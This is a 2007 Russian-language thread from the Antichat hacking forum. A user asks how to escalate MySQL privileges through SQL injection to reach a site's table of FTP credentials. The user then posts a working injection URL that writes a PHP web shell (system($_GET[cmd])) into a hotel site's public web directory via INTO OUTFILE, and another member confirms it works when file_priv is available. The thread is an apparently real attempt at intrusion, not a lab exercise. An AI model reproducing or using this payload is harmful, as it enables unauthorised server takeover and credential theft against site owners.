Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Проблема с доступом к Sql БД (https://forum.antichat.xyz/showthread.php?t=55434)

~EviL~ 10.12.2007 01:53
Проблема с доступом к Sql БД
 
Я нашел таблицу для фтп доступа к сайту и у меня нет прав на ее прочтение. Есть же таблица User_privileges, можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection? Заранее спасибо :)

Termin@L 10.12.2007 02:01
Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов

~EviL~ 10.12.2007 02:14
Мдам, спасибо =)

~EviL~ 10.12.2007 03:15
А вот, я правильно создаю шелл:
Код HTML:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE+'/users/hotels/public_html/shell.php'/*

.Slip 10.12.2007 08:29
Цитата:
Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов
Пи*дец, думай хоть немного когда пишешь.
Цитата:
можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection?
Технически да, практически нет. Даже если для ремоут юзера разрешён update, то в субд mysql ничего не получится сделать, т.к. отсутствует поддержка подзапросов.
Цитата:
А вот, я правильно создаю шелл:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE +'/users/hotels/public_html/shell.php'/*
Ну если есть file_priv и файл создаётся, то правильно.

~EviL~ 10.12.2007 08:38
Нет там file_priv и файл не создается. Значит - не судьба =)


Время: 21:13